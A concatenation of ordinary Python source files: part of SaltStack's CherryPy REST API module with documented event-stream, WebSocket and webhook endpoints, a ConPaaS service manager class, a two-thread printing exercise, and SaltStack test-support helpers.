ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
manager.py | # -*- coding: utf-8 -*-
"""
conpaas.core.manager
====================
ConPaaS core: service-independent manager code.
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
import time
import os.path
import libcloud
from conpaas.core.log import create_logger
from conpaas.core.expose import expose
from conpaas.core.controller import Controller
from conpaas.core.https.server import HttpJsonResponse
from conpaas.core.https.server import HttpErrorResponse
from conpaas.core.https.server import FileUploadField
from conpaas.core import ipop
from conpaas.core.ganglia import ManagerGanglia
class BaseManager(object):
"""Manager class with the following exposed methods:
startup() -- POST
getLog() -- GET
upload_startup_script() -- UPLOAD
get_startup_script() -- GET
"""
# Manager states
S_INIT = 'INIT' # manager initialized but not yet started
S_PROLOGUE = 'PROLOGUE' # manager is starting up
S_RUNNING = 'RUNNING' # manager is running
S_ADAPTING = 'ADAPTING' # manager is in a transient state - frontend will
# keep polling until manager out of transient state
S_EPILOGUE = 'EPILOGUE' # manager is shutting down
S_STOPPED = 'STOPPED' # manager stopped
S_ERROR = 'ERROR' # manager is in error state
# String template for error messages returned when performing actions in
# the wrong state
WRONG_STATE_MSG = "ERROR: cannot perform %(action)s in state %(curstate)s"
# String template for error messages returned when a required argument is
# missing
REQUIRED_ARG_MSG = "ERROR: %(arg)s is a required argument"
# String template for debugging messages logged on nodes creation
ACTION_REQUESTING_NODES = "requesting %(count)s nodes in %(action)s"
AGENT_PORT = 5555
def __init__(self, config_parser):
self.logger = create_logger(__name__)
self.logger.debug('Using libcloud version %s' % libcloud.__version__)
self.controller = Controller(config_parser)
self.logfile = config_parser.get('manager', 'LOG_FILE')
self.config_parser = config_parser
self.state = self.S_INIT
self.volumes = []
# IPOP setup
ipop.configure_conpaas_node(config_parser)
# Ganglia setup
self.ganglia = ManagerGanglia(config_parser)
try:
self.ganglia.configure()
except Exception, err:
self.logger.exception('Error configuring Ganglia: %s' % err)
self.ganglia = None
return
err = self.ganglia.start()
if err:
self.logger.exception(err)
self.ganglia = None
else:
self.logger.info('Ganglia started successfully')
@expose('POST')
def startup(self, kwargs):
"""Start the given service"""
# Starting up the service makes sense only in the INIT or STOPPED
# states
if self.state != self.S_INIT and self.state != self.S_STOPPED:
vals = { 'curstate': self.state, 'action': 'startup' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Check if the specified cloud, if any, is available
if 'cloud' in kwargs:
try:
self._init_cloud(kwargs['cloud'])
except Exception:
return HttpErrorResponse(
"A cloud named '%s' could not be found" % kwargs['cloud'])
self.logger.info('Manager starting up')
self.state = self.S_PROLOGUE
Thread(target=self._do_startup, kwargs=kwargs).start()
return HttpJsonResponse({ 'state': self.state })
@expose('GET')
def getLog(self, kwargs):
"""Return logfile"""
try:
return HttpJsonResponse({'log': open(self.logfile).read()})
except:
return HttpErrorResponse('Failed to read log')
def upload_script(self, kwargs, filename):
"""Write the file uploaded in kwargs['script'] to filesystem.
Return the script absoulte path on success, HttpErrorResponse on
failure.
"""
self.logger.debug("upload_script: called with filename=%s" % filename)
# Check if the required argument 'script' is present
if 'script' not in kwargs:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_MISSING, 'script').message)
script = kwargs.pop('script')
# Check if any trailing parameter has been submitted
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
# Script has to be a FileUploadField
if not isinstance(script, FileUploadField):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID,
detail='script should be a file'
).message)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, filename)
# Write the uploaded script to filesystem
open(fullpath, 'w').write(script.file.read())
self.logger.debug("upload_script: script uploaded successfully to '%s'"
% fullpath)
# Return the script absolute path
return fullpath
@expose('UPLOAD')
def upload_startup_script(self, kwargs):
ret = self.upload_script(kwargs, 'startup.sh')
if type(ret) is HttpErrorResponse:
# Something went wrong. Return the error
return ret
# Rebuild context script
self.controller.generate_context("web")
# All is good. Return the filename of the uploaded script
return HttpJsonResponse({'filename': ret})
@expose('GET')
def get_startup_script(self, kwargs):
"""Return contents of the currently defined startup script, if any"""
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, 'startup.sh')
try:
return HttpJsonResponse(open(fullpath).read())
except IOError:
return HttpErrorResponse('No startup script')
def create_volume(self, size, name, vm_id, cloud=None):
self.logger.info('Creating a volume named %s (%s MBs)' % (
name, size))
# If cloud is None, the controller will create this volume on the
# default cloud
volume = self.controller.create_volume(size, name, vm_id, cloud)
# Keep track of the cloud this volume has been created on
volume.cloud = cloud
# Keep track of this volume
self.volumes.append(volume)
return volume
def get_volume(self, volume_id):
for vol in self.volumes:
if volume_id == vol.id:
return vol
known_volumes = [ vol.id for vol in self.volumes ]
raise Exception("Volume '%s' not found. Known volumes: %s" %
(volume_id, known_volumes))
def destroy_volume(self, volume_id):
self.logger.info("Destroying volume with id %s" % volume_id)
try:
volume = self.get_volume(volume_id)
except Exception:
self.logger.info("Volume %s not known" % volume_id)
return
for attempt in range(1, 11):
try:
ret = self.controller.destroy_volume(volume, volume.cloud)
except Exception, err:
self.logger.info("Attempt %s: %s" % (attempt, err))
# It might take a bit for the volume to actually be
# detached. Let's wait a little and try again.
time.sleep(10)
if ret:
self.volumes.remove(volume)
else:
raise Exception("Error destroying volume %s" % volume_id)
def attach_volume(self, volume_id, vm_id, device_name):
self.logger.info("Attaching volume %s to VM %s as %s" % (volume_id,
vm_id, device_name))
volume = self.get_volume(volume_id)
class node:
id = vm_id
return self.controller.attach_volume(node, volume, device_name,
volume.cloud)
def detach_volume(self, volume_id):
self.logger.info("Detaching volume %s..." % volume_id)
volume = self.get_volume(volume_id)
ret = self.controller.detach_volume(volume, volume.cloud)
self.logger.info("Volume %s detached" % volume_id)
return ret
def _init_cloud(self, cloud):
if cloud == 'default':
cloud = 'iaas'
return self.controller.get_cloud_by_name(cloud)
class ManagerException(Exception):
E_CONFIG_READ_FAILED = 0
E_CONFIG_COMMIT_FAILED = 1
E_ARGS_INVALID = 2
E_ARGS_UNEXPECTED = 3
E_ARGS_MISSING = 4
E_IAAS_REQUEST_FAILED = 5
E_STATE_ERROR = 6
E_CODE_VERSION_ERROR = 7
E_NOT_ENOUGH_CREDIT = 8
E_UNKNOWN = 9
E_STRINGS = [
'Failed to read configuration',
'Failed to commit configuration',
'Invalid arguments',
'Unexpected arguments %s', # 1 param (a list)
'Missing argument "%s"', # 1 param
'Failed to request resources from IAAS',
'Cannot perform requested operation in current state',
'No code version selected',
'Not enough credits',
'Unknown error',
]
def __init__(self, code, *args, **kwargs):
self.code = code
self.args = args
if 'detail' in kwargs:
self.message = '%s DETAIL:%s' % (
(self.E_STRINGS[code] % args), str(kwargs['detail']))
else:
self.message = self.E_STRINGS[code] % args
|
important_exercise.py | """
使用两个线程,
一个打印1-52 这52个数字
一个打印a-z这些字母
两个线程一起执行,要求打印出来的顺序为
12A34B...5152Z
多为面试题的笔试题
"""
from threading import Lock, Thread
import time
lock01 = Lock()
lock02 = Lock()
def print_int():
for i in range(1, 52, 2):
lock01.acquire()
print(i)
print(i + 1)
lock02.release()
def print_alpha():
for i in range(65, 91):
lock02.acquire()
print(chr(i))
lock01.release()
t1 = Thread(target=print_alpha)
t2 = Thread(target=print_int)
lock02.acquire()
t2.start()
t1.start()
|
helpers.py | # -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import functools
import inspect
import logging
import os
import random
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
from salt.ext import six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
try:
from pytestsalt.utils import get_unused_localhost_port # pylint: disable=unused-import
except ImportError:
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
usock.close()
return port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES, TMP
# Import Salt libs
import salt.utils.files
import salt.utils.platform
import salt.utils.stringutils
if salt.utils.platform.is_windows():
import salt.utils.win_functions
else:
import pwd
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
def no_symlinks():
'''
Check if git is installed and has symlinks enabled in the configuration.
'''
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ''
try:
output = subprocess.Popen(
['git', 'config', '--get', 'core.symlinks'],
cwd=TMP,
stdout=subprocess.PIPE).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == 'true':
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
'''
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Destructive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Destructive tests are disabled')
return caller(cls)
return wrap
def expensiveTest(caller):
'''
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Expensive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Expensive tests are disabled')
return caller(cls)
return wrap
def flaky(caller=None, condition=True, attempts=4):
'''
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, flaky(caller=function, condition=condition, attempts=attempts))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
return caller(cls)
except Exception as exc:
if attempt >= attempts -1:
raise exc
backoff_time = attempt ** 2
log.info(
'Found Exception. Waiting %s seconds to retry.',
backoff_time
)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
'''
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
self.skipTest('SSH tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
cls.skipTest('SSH tests are disabled')
return caller(cls)
return wrap
class RedirectStdStreams(object):
'''
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
'''
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
stdout = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
if stderr is None:
stderr = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception:
pass
try:
self.__stderr.flush()
except Exception:
pass
class TestsLoggingHandler(object):
'''
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TestsLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
'''
def __init__(self, level=0, format='%(levelname)s:%(message)s'):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
